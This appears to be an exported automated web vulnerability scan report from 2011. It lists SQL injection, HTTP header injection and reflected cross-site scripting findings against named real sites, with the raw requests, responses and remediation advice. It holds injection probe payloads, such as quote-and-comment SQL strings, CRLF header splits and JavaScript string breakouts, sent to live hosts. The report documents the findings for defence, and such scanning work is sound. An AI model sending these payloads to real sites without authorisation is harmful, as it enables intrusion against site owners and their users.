The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
Request 1
GET /rsrc.php/yb/r/oe16nW8etrA.js'%20and%201%3d1--%20 HTTP/1.1 Host: b.static.ak.fbcdn.net Proxy-Connection: keep-alive Referer: http://www.facebook.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 404 Not Found Content-Length: 7 Content-Type: text/html; charset=utf-8 Pragma: X-Bad-Checksum: yb X-Cnection: close Vary: Accept-Encoding Cache-Control: public, max-age=86400 Expires: Tue, 01 Feb 2011 22:31:40 GMT Date: Mon, 31 Jan 2011 22:31:40 GMT Connection: close
/*bcs*/
Request 2
GET /rsrc.php/yb/r/oe16nW8etrA.js'%20and%201%3d2--%20 HTTP/1.1 Host: b.static.ak.fbcdn.net Proxy-Connection: keep-alive Referer: http://www.facebook.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 403 Forbidden X-FATAL-REQUEST: b.static.ak.fbcdn.net Content-Type: text/html; charset=utf-8 X-Cnection: close Content-Length: 0 Vary: Accept-Encoding Expires: Mon, 31 Jan 2011 22:31:40 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 31 Jan 2011 22:31:40 GMT Connection: close
2. HTTP header injectionpreviousnext There are 3 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
2.1. http://533.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://533.xg4ken.com
Path:
/media/redir.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload c3535%0d%0af2d4ce06a4e was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=3&camp=890&affcode=cr3120099&cid=6722156085|41438|spa%20deals&mType=&networkType=content&url[]=http%3A%2F%2Fwww.groupon.com%3Futm_source%3DGoogle%26utm_medium%3Dcpc%26utm_campaign%3DContent%26d%3DNational_Content%26g%3DSpa_-_Deals%26utm_term%3Dspa%20deals%26p%3Dmail.google.com%26a%3DText%26k_clickID%3D_kenshoo_clickid_&c3535%0d%0af2d4ce06a4e=1 HTTP/1.1 Host: 533.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Tue, 01 Feb 2011 01:43:42 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=4022230d-a26e-8d88-d321-00001d61caa4; expires=Mon, 02-May-2011 01:43:42 GMT; path=/; domain=.xg4ken.com Location: http://www.groupon.com?utm_source=Google&utm_medium=cpc&utm_campaign=Content&d=National_Content&g=Spa_-_Deals&utm_term=spa deals&p=mail.google.com&a=Text&k_clickID=4022230d-a26e-8d88-d321-00001d61caa4&c3535 f2d4ce06a4e=1 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The value of the url[] request parameter is copied into the Location response header. The payload 9edff%0d%0ab2fe8e7e43e was submitted in the url[] parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=3&camp=890&affcode=cr3120099&cid=6722156085|41438|spa%20deals&mType=&networkType=content&url[]=http%3A%2F%2Fwww.groupon.com%3Futm_source%3DGoogle%26utm_medium%3Dcpc%26utm_campaign%3DContent%26d%3DNational_Content%26g%3DSpa_-_Deals%26utm_term%3Dspa%20deals%26p%3Dmail.google.com%26a%3DText%26k_clickID%3D_kenshoo_clickid_9edff%0d%0ab2fe8e7e43e HTTP/1.1 Host: 533.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Mon, 31 Jan 2011 02:55:13 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=39b78f33-9e98-20a9-8339-0000787da17f; expires=Sun, 01-May-2011 02:55:13 GMT; path=/; domain=.xg4ken.com Location: http://www.groupon.com?utm_source=Google&utm_medium=cpc&utm_campaign=Content&d=National_Content&g=Spa_-_Deals&utm_term=spa deals&p=mail.google.com&a=Text&k_clickID=39b78f33-9e98-20a9-8339-0000787da17f9edff b2fe8e7e43e P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The value of REST URL parameter 2 is copied into the Location response header. The payload 5cfdc%0d%0a0b11d3a2ea9 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /deals/socialads_reflector5cfdc%0d%0a0b11d3a2ea9 HTTP/1.1 Host: livingsocial.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 31 Jan 2011 02:58:56 GMT Content-Type: text/html Content-Length: 178 Connection: close Location: http://partners.livingsocial.com/deals/socialads_reflector5cfdc 0b11d3a2ea9
<html> <head><title>301 Moved Permanently</title></head> <body bgcolor="white"> <center><h1>301 Moved Permanently</h1></center> <hr><center>nginx</center> </body> </html>
3. Cross-site scripting (reflected)previous There are 95 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ba71'%3bf1e47d0dfa was submitted in the REST URL parameter 2. This input was echoed as 5ba71';f1e47d0dfa in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940925ba71'%3bf1e47d0dfa/Article_2011-01-29-Comcast%20NBC/id-5c0db4c644554731b788461e4d1c7384 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86400 Date: Sun, 30 Jan 2011 18:32:47 GMT Connection: close Connection: Transfer-Encoding Content-Length: 67098
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940925ba71';f1e47d0dfa/id-5c0db4c644554731b788461e4d1c7384'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8dd9b'%3b93992f719ae was submitted in the REST URL parameter 2. This input was echoed as 8dd9b';93992f719ae in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940928dd9b'%3b93992f719ae/Article_2011-01-29-Music%20In%20Schools/id-37ae6ea76f3a489f9e545a72aec815f1 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86390 Date: Sun, 30 Jan 2011 18:32:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 65562
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940928dd9b';93992f719ae/id-37ae6ea76f3a489f9e545a72aec815f1'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7fd17'%3b5c6377d3093 was submitted in the REST URL parameter 2. This input was echoed as 7fd17';5c6377d3093 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940927fd17'%3b5c6377d3093/Article_2011-01-29-Obit%20Babbitt/id-f2ca249bac914a0091f0cd72a15ed3fe HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86400 Date: Sun, 30 Jan 2011 18:32:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 59674
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940927fd17';5c6377d3093/id-f2ca249bac914a0091f0cd72a15ed3fe'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8b36'%3b4ece5fa1576 was submitted in the REST URL parameter 2. This input was echoed as b8b36';4ece5fa1576 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092b8b36'%3b4ece5fa1576/Article_2011-01-29-Obit%20David%20Frye/id-70e19413e11241018ba03dcc13085098 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86400 Date: Sun, 30 Jan 2011 18:32:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 59975
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092b8b36';4ece5fa1576/id-70e19413e11241018ba03dcc13085098'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb6ae'%3b4828b38e5f2 was submitted in the REST URL parameter 2. This input was echoed as bb6ae';4828b38e5f2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092bb6ae'%3b4828b38e5f2/Article_2011-01-29-People%20Chris%20Brown/id-8595155a6ad643128619d3de36a7f0a8 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86358 Date: Sun, 30 Jan 2011 18:32:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 64598
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092bb6ae';4828b38e5f2/id-8595155a6ad643128619d3de36a7f0a8'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a8f3'%3b049df0e7958 was submitted in the REST URL parameter 2. This input was echoed as 9a8f3';049df0e7958 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940929a8f3'%3b049df0e7958/Article_2011-01-30-ABC%20Amanpour/id-7b493e6f40cf48d4bdbcee931b98f8ba HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86377 Date: Mon, 31 Jan 2011 02:59:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 64231
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940929a8f3';049df0e7958/id-7b493e6f40cf48d4bdbcee931b98f8ba'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ec54'%3b71b3d9d3cdd was submitted in the REST URL parameter 2. This input was echoed as 1ec54';71b3d9d3cdd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940921ec54'%3b71b3d9d3cdd/Article_2011-01-30-Awards/id-011fe4db06e447ae8d981d77dadaa359 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86400 Date: Mon, 31 Jan 2011 02:59:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 67569
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940921ec54';71b3d9d3cdd/id-011fe4db06e447ae8d981d77dadaa359'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9b7a'%3b4197b723f8f was submitted in the REST URL parameter 2. This input was echoed as d9b7a';4197b723f8f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092d9b7a'%3b4197b723f8f/Article_2011-01-30-Awards/id-3900b15cae5b41bf95c0328a35f712a4 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86400 Date: Sun, 30 Jan 2011 18:32:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 60979
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092d9b7a';4197b723f8f/id-3900b15cae5b41bf95c0328a35f712a4'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98a74'%3bb06d726fa4a was submitted in the REST URL parameter 2. This input was echoed as 98a74';b06d726fa4a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b2141609409298a74'%3bb06d726fa4a/Article_2011-01-30-Awards/id-4ec4262c596c4dc398bd498866494285 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86400 Date: Tue, 01 Feb 2011 02:39:54 GMT Connection: close Connection: Transfer-Encoding Content-Length: 66432
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b2141609409298a74';b06d726fa4a/id-4ec4262c596c4dc398bd498866494285'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bb90'%3b448814ce715 was submitted in the REST URL parameter 2. This input was echoed as 8bb90';448814ce715 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940928bb90'%3b448814ce715/Article_2011-01-30-Awards/id-6a08f1abbeb54af69cb1816d8a39180b HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86356 Date: Mon, 31 Jan 2011 02:59:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 68076
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940928bb90';448814ce715/id-6a08f1abbeb54af69cb1816d8a39180b'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
